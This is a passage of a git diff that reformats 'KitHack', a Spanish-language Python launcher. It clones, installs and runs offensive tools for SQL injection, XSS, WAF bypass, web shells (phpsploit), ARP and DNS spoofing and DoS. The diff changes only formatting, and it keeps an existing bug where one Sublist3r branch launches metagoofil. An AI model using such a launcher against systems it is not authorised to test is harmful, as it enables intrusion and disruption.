Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Web && git clone https://github.com/the-c0d3r/sqli-scanner.git" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Web/sqli-scanner" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Web && cd sqli-scanner && python sqli-scanner.py -h" + ) + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Web && cd sqli-scanner && python sqli-scanner.py -h" + ) + def Joomscan(): - if not os.path.isdir('tools/Web/joomscan'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Web && git clone https://github.com/rezasp/joomscan.git') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Web/joomscan".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Web && cd joomscan && perl joomscan.pl') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Web && cd joomscan && perl joomscan.pl') + if not os.path.isdir("tools/Web/joomscan"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Web && git clone https://github.com/rezasp/joomscan.git" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Web/joomscan" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system("cd tools && cd Web && cd joomscan && perl joomscan.pl") + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system("cd tools && cd Web && cd joomscan && perl joomscan.pl") + def Metagoofil(): - if not os.path.isdir('tools/Web/metagoofil'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Web && git clone https://github.com/laramies/metagoofil.git') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Web/metagoofil".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Web && cd metagoofil && python metagoofil.py') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Web && cd metagoofil && python metagoofil.py') + if not os.path.isdir("tools/Web/metagoofil"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Web && git clone https://github.com/laramies/metagoofil.git" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Web/metagoofil" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Web && cd metagoofil && python metagoofil.py") + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Web && cd metagoofil && python metagoofil.py") + def Sublist3r(): - if not os.path.isdir('tools/Web/Sublist3r'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Web && git clone https://github.com/aboul3la/Sublist3r.git && cd Sublist3r && pip install -r requirements.txt') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Web/Sublist3r".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Web && cd Sublist3r && python sublist3r.py -h') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Web && cd metagoofil && python metagoofil.py') + if not os.path.isdir("tools/Web/Sublist3r"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Web && git clone https://github.com/aboul3la/Sublist3r.git && cd Sublist3r && pip install -r requirements.txt" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Web/Sublist3r" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Web && cd Sublist3r && python sublist3r.py -h") + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Web && cd metagoofil && python metagoofil.py") + def WAFNinja(): - if not os.path.isdir('tools/Web/WAFNinja'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Web && git clone https://github.com/khalilbijjou/WAFNinja.git && cd WAFNinja && pip install -r requirements.txt') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Web/WAFNinja".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Web && cd WAFNinja && python wafninja.py -h') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Web && cd WAFNinja && python wafninja.py -h') + if not os.path.isdir("tools/Web/WAFNinja"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Web && git clone https://github.com/khalilbijjou/WAFNinja.git && cd WAFNinja && pip install -r requirements.txt" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Web/WAFNinja" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Web && cd WAFNinja && python wafninja.py -h") + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Web && cd WAFNinja && python wafninja.py -h") + def Dirsearch(): - if not os.path.isdir('tools/Web/dirsearch'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('apt-get install python3.7 && cd tools && cd Web && git clone https://github.com/maurosoria/dirsearch.git') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Web/dirsearch".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Web && cd dirsearch && python3 dirsearch.py -h') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Web && cd dirsearch && python3 dirsearch.py -h') + if not os.path.isdir("tools/Web/dirsearch"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "apt-get install python3.7 && cd tools && cd Web && git clone https://github.com/maurosoria/dirsearch.git" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Web/dirsearch" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Web && cd dirsearch && python3 dirsearch.py -h" + ) + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Web && cd dirsearch && python3 dirsearch.py -h" + ) + def XSStrike(): - if not os.path.isdir('tools/Web/XSStrike'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Web && git clone https://github.com/s0md3v/XSStrike.git && cd XSStrike && pip install -r requirements.txt') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Web/XSStrike".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Web && cd XSStrike && python xsstrike.py') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Web && cd XSStrike && python xsstrike.py') + if not os.path.isdir("tools/Web/XSStrike"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Web && git clone https://github.com/s0md3v/XSStrike.git && cd XSStrike && pip install -r requirements.txt" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Web/XSStrike" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Web && cd XSStrike && python xsstrike.py") + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Web && cd XSStrike && python xsstrike.py") + def LinksF1nd3r(): - if not os.path.isdir('tools/Web/LinksF1nd3r'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Web && git clone https://github.com/ihebski/LinksF1nd3r.git && cd LinksF1nd3r && pip install -r requirements.txt') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Web/linksF1nd3r".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Web && cd LinksF1nd3r && python linksF1nd3r.py') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Web && cd LinksF1nd3r && python linksF1nd3r.py') + if not os.path.isdir("tools/Web/LinksF1nd3r"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Web && git clone https://github.com/ihebski/LinksF1nd3r.git && cd LinksF1nd3r && pip install -r requirements.txt" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Web/linksF1nd3r" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Web && cd LinksF1nd3r && python linksF1nd3r.py" + ) + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Web && cd LinksF1nd3r && python linksF1nd3r.py" + ) + def DTECH(): - if not os.path.isdir('tools/Web/D-Tech'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Web && git clone https://github.com/bibortone/D-Tech.git') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Web/D-Tech".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Web && cd D-Tech && python d-tect.py') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Web && cd D-Tech && python d-tect.py') + if not os.path.isdir("tools/Web/D-Tech"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Web && git clone https://github.com/bibortone/D-Tech.git" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Web/D-Tech". + format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system("cd tools && cd Web && cd D-Tech && python d-tect.py") + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system("cd tools && cd Web && cd D-Tech && python d-tect.py") + def Phpsploit(): - if not os.path.isdir('tools/Web/phpsploit'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('apt install python3 python3-pip && cd tools && cd Web && git clone https://github.com/nil0x42/phpsploit.git && cd phpsploit && pip3 install -r requirements.txt') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Web/phpsploit".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Web && cd phpsploit && python3 phpsploit --interactive --eval "help help"') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Web && cd phpsploit && python3 phpsploit --interactive --eval "help help"') - -#Tools Spoofing + if not os.path.isdir("tools/Web/phpsploit"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "apt install python3 python3-pip && cd tools && cd Web && git clone https://github.com/nil0x42/phpsploit.git && cd phpsploit && pip3 install -r requirements.txt" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Web/phpsploit" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + 'cd tools && cd Web && cd phpsploit && python3 phpsploit --interactive --eval "help help"' + ) + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + 'cd tools && cd Web && cd phpsploit && python3 phpsploit --interactive --eval "help help"' + ) + + +# Tools Spoofing + + def SpoofMAC(): - if not os.path.isdir('tools/Spoofing/SpoofMAC'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Spoofing && git clone git://github.com/feross/SpoofMAC.git && cd SpoofMAC && python setup.py install') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Spoofing/SpoofMAC".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Spoofing && cd SpoofMAC && cd scripts && python spoof-mac.py') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Spoofing && cd SpoofMAC && cd scripts && python spoof-mac.py') + if not os.path.isdir("tools/Spoofing/SpoofMAC"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Spoofing && git clone git://github.com/feross/SpoofMAC.git && cd SpoofMAC && python setup.py install" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Spoofing/SpoofMAC" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Spoofing && cd SpoofMAC && cd scripts && python spoof-mac.py" + ) + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Spoofing && cd SpoofMAC && cd scripts && python spoof-mac.py" + ) + def IpSpoofing(): - if not os.path.isdir('tools/Spoofing/ip_spoofing'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Spoofing && git clone https://github.com/pankajmore/ip_spoofing.git') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Spoofing/ip_spoofing".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Spoofing && cd ip_spoofing && python dos_attack.py') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Spoofing && cd ip_spoofing && python dos_attack.py') + if not os.path.isdir("tools/Spoofing/ip_spoofing"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Spoofing && git clone https://github.com/pankajmore/ip_spoofing.git" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Spoofing/ip_spoofing" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Spoofing && cd ip_spoofing && python dos_attack.py" + ) + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Spoofing && cd ip_spoofing && python dos_attack.py" + ) + def Arpspoof(): - if not os.path.isdir('tools/Spoofing/arpspoof'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Spoofing && git clone https://github.com/ickerwx/arpspoof.git') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Spoofing/arpspoof".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Spoofing && cd arpspoof && python arpspoof.py -h') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Spoofing && cd arpspoof && python arpspoof.py -h') + if not os.path.isdir("tools/Spoofing/arpspoof"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Spoofing && git clone https://github.com/ickerwx/arpspoof.git" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Spoofing/arpspoof" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Spoofing && cd arpspoof && python arpspoof.py -h" + ) + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Spoofing && cd arpspoof && python arpspoof.py -h" + ) + def DerpNSpoof(): - if not os.path.isdir('tools/Spoofing/DerpNSpoof'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('apt install python3-pip && cd tools && cd Spoofing && git clone https://github.com/Trackbool/DerpNSpoof.git && cd DerpNSpoof && pip install -r requirements.txt') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Spoofing/DerpNSpoof".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Spoofing && cd DerpNSpoof && python3 DerpNSpoof.py') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Spoofing && cd DerpNSpoof && python3 DerpNSpoof.py') + if not os.path.isdir("tools/Spoofing/DerpNSpoof"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "apt install python3-pip && cd tools && cd Spoofing && git clone https://github.com/Trackbool/DerpNSpoof.git && cd DerpNSpoof && pip install -r requirements.txt" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Spoofing/DerpNSpoof" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Spoofing && cd DerpNSpoof && python3 DerpNSpoof.py" + ) + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Spoofing && cd DerpNSpoof && python3 DerpNSpoof.py" + ) + def DrSpoof(): - if not os.path.isdir('tools/Spoofing/Dr.Spoof'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Spoofing && git clone https://github.com/Enixes/Dr.Spoof.git && cd Dr.Spoof && chmod +x DrSpoof.sh') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Spoofing/Dr.Spoof".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Spoofing && cd Dr.Spoof && bash DrSpoof.sh -h') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Spoofing && cd Dr.Spoof && bash DrSpoof.sh -h') + if not os.path.isdir("tools/Spoofing/Dr.Spoof"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Spoofing && git clone https://github.com/Enixes/Dr.Spoof.git && cd Dr.Spoof && chmod +x DrSpoof.sh" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Spoofing/Dr.Spoof" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Spoofing && cd Dr.Spoof && bash DrSpoof.sh -h") + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Spoofing && cd Dr.Spoof && bash DrSpoof.sh -h") + def GODKILLER(): - if not os.path.isdir('tools/Spoofing/GOD-KILLER'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Spoofing && git clone https://github.com/FDX100/GOD-KILLER.git && cd GOD-KILLER && python install.py') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Spoofing/GOD-KILLER".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('GOD-KILLER') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('GOD-KILLER') - -#Tools Information Gathering + if not os.path.isdir("tools/Spoofing/GOD-KILLER"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Spoofing && git clone https://github.com/FDX100/GOD-KILLER.git && cd GOD-KILLER && python install.py" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en 